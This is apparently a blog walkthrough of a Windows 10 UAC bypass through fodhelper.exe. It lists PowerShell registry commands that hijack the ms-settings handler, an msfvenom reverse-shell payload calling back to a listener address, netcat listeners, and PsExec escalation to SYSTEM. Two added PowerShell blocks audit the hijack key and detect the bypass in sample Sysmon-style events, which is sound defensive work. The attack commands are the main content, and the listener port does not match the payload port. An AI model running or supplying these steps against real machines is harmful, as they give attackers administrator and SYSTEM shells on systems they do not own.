
Using fodhelper to bypass UAC in Windows 10

3 min read · Sep 26, 2022

Users of Windows 10 environments can control language preferences for a number of Windows features, including text-to-speech and typing. A process named fodhelper.exe is launched whenever a user opens “Manage Optional Features” in Windows Settings to change the language. Because the binary’s autoElevate setting is “true,” this process runs with high integrity.

Check Permission

If we are in the Medium Mandatory Level or High Mandatory Level group, we can use fodhelper to bypass UAC.

Manual Check Method

whoami /groups

Using Tools

SharpUp.exe can be used to check whether UAC can be bypassed.

SharpUp.exe "audit"

Steps to bypass UAC with fodhelper.

Via RDP

1. Run the following command in PowerShell to create the registry structure.

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force

2. Run the following command in PowerShell to add the DelegateExecute registry property.

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

3. Run fodhelper.

fodhelper

We get a cmd.exe running with administrator privileges.
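From the defender's side, the bypass leaves two things to check for: the per-user ms-settings handler key it creates (which has no legitimate reason to exist under HKCU), and the UAC level, since auto-elevation only happens below the “Always notify” setting. The PowerShell below is an added example, not code from the original post; the function names (Get-FodhelperHijackKey, Remove-FodhelperHijackKey, Get-UacConfiguration) are my own, and it assumes it is run in the context of the user being audited because the key lives in HKCU.

```powershell
# Added example (not from the original post): audit and clean up the HKCU
# ms-settings handler that the fodhelper bypass relies on, and report the
# UAC policy values that determine whether auto-elevation is allowed.

$HijackKey = 'HKCU:\Software\Classes\ms-settings\shell\open\command'

function Get-FodhelperHijackKey {
    # Returns $null when the key is absent (the normal state), otherwise an
    # object describing the (default) command and the DelegateExecute value.
    if (-not (Test-Path -Path $HijackKey)) { return $null }

    $item = Get-Item -Path $HijackKey
    [pscustomobject]@{
        Path            = $HijackKey
        DefaultCommand  = $item.GetValue('')                # the "(default)" value
        DelegateExecute = $item.GetValue('DelegateExecute')
        HasDelegate     = ($null -ne $item.GetValue('DelegateExecute'))
    }
}

function Remove-FodhelperHijackKey {
    # Ordinary users have no reason to own an ms-settings protocol handler under
    # HKCU; removing the whole subtree restores the default (HKLM) handler.
    $root = 'HKCU:\Software\Classes\ms-settings'
    if (Test-Path -Path $root) {
        Remove-Item -Path $root -Recurse -Force
        return $true
    }
    return $false
}

function Get-UacConfiguration {
    # ConsentPromptBehaviorAdmin = 2 together with PromptOnSecureDesktop = 1 is
    # the "Always notify" level, at which auto-elevate binaries such as
    # fodhelper.exe still prompt. EnableLUA = 0 means UAC is disabled entirely.
    $policy = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p = Get-ItemProperty -Path $policy
    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $p.PromptOnSecureDesktop
        AlwaysNotify               = ($p.ConsentPromptBehaviorAdmin -eq 2 -and $p.PromptOnSecureDesktop -eq 1)
    }
}

# Usage: report the handler key if present, then show the UAC level.
$finding = Get-FodhelperHijackKey
if ($finding) {
    Write-Warning "Per-user ms-settings handler present: $($finding.DefaultCommand)"
    $finding | Format-List
    # Uncomment to remediate on the spot:
    # Remove-FodhelperHijackKey | Out-Null
} else {
    Write-Host 'No ms-settings handler under HKCU (expected).'
}
Get-UacConfiguration | Format-List
```

Get-UacConfiguration reads policy values, so it works from a standard user session; the remediation step only needs rights over the current user's hive, which is why it can be run by the affected user or by a helpdesk script impersonating them.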

Reverse Shell

We can get a reverse shell with the UAC bypass.

1. Use msfvenom to generate reverse.exe with a reverse shell payload.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.214 LPORT=53 -f exe > reverse.exe

2. Run the following command in PowerShell to create the registry structure.

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value c:\users\public\reverse.exe -Force

3. Run the following command in PowerShell to add the DelegateExecute registry property.

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

4. Use nc to listen on port 443.

nc -lnvp 443

5. Run fodhelper.

fodhelper

6. We get a shell as 2bit.
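Both variants above (cmd.exe and reverse.exe) produce the same two telemetry signals: a registry value written under a per-user ms-settings\shell\open\command key, and a child process of fodhelper.exe. The PowerShell below is an added example, not code from the original post; it runs a minimal detection pass over constructed sample records shaped like Sysmon Event ID 13 (registry value set) and Event ID 1 (process create). The function name Find-FodhelperBypass and the sample events are my own; a real deployment would feed it events read from the Sysmon operational log.

```powershell
# Added example (not from the original post): flag the two symptoms of the
# fodhelper bypass in Sysmon-style events. All records below are constructed
# sample data; the SID and paths are placeholders.

$SampleEvents = @(
    [pscustomobject]@{ Id = 13; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        TargetObject = 'HKU\S-1-5-21-1000-2000-3000-1001\Software\Classes\ms-settings\shell\open\command\(Default)'
        Details = 'cmd.exe' }
    [pscustomobject]@{ Id = 13; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        TargetObject = 'HKU\S-1-5-21-1000-2000-3000-1001\Software\Classes\ms-settings\shell\open\command\DelegateExecute'
        Details = '' }
    [pscustomobject]@{ Id = 1; Image = 'C:\Windows\System32\cmd.exe'
        ParentImage = 'C:\Windows\System32\fodhelper.exe'; IntegrityLevel = 'High' }
    [pscustomobject]@{ Id = 1; Image = 'C:\Windows\System32\notepad.exe'
        ParentImage = 'C:\Windows\explorer.exe'; IntegrityLevel = 'Medium' }   # benign control record
)

function Find-FodhelperBypass {
    param([Parameter(Mandatory)][object[]]$Events)

    $findings = @()
    foreach ($e in $Events) {
        switch ($e.Id) {
            13 {
                # Any write to a per-user ms-settings handler is suspicious:
                # software does not register this protocol under HKU.
                if ($e.TargetObject -match '\\Software\\Classes\\ms-settings\\shell\\open\\command') {
                    $findings += [pscustomobject]@{
                        Rule    = 'ms-settings handler written under HKU'
                        Image   = $e.Image
                        Target  = $e.TargetObject
                        Details = $e.Details
                    }
                }
            }
            1 {
                # fodhelper.exe is not expected to spawn a shell or interpreter;
                # a high-integrity child is the direct symptom of the bypass.
                if ($e.ParentImage -match '\\fodhelper\.exe$') {
                    $findings += [pscustomobject]@{
                        Rule    = 'child process of fodhelper.exe'
                        Image   = $e.Image
                        Target  = $e.ParentImage
                        Details = "IntegrityLevel=$($e.IntegrityLevel)"
                    }
                }
            }
        }
    }
    return $findings
}

# Usage: three of the four sample records should be flagged; notepad.exe is not.
$results = Find-FodhelperBypass -Events $SampleEvents
Write-Host "$($results.Count) finding(s)"
$results | Format-Table -AutoSize
```

The registry rule is the earlier of the two signals and fires before fodhelper is ever launched, so it is the one to alert on; the parent-child rule confirms that the prepared key was actually used. In Sysmon, both require a configuration that includes the ms-settings key path in the RegistryEvent filter and ProcessCreate logging, which is not on by default.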

Get a shell as SYSTEM.

We can combine PsExec with the UAC bypass to get a shell as SYSTEM.

1. Use nc to listen on port 443.
nc -lnvp 443

2. Run the following command to execute reverse.exe with PsExec.

PsExec64.exe -accepteula -i -s C:\users\2bit\Documents\reverse.exe

3. We get a shell as nt authority\system.

Written by GrimTheRipper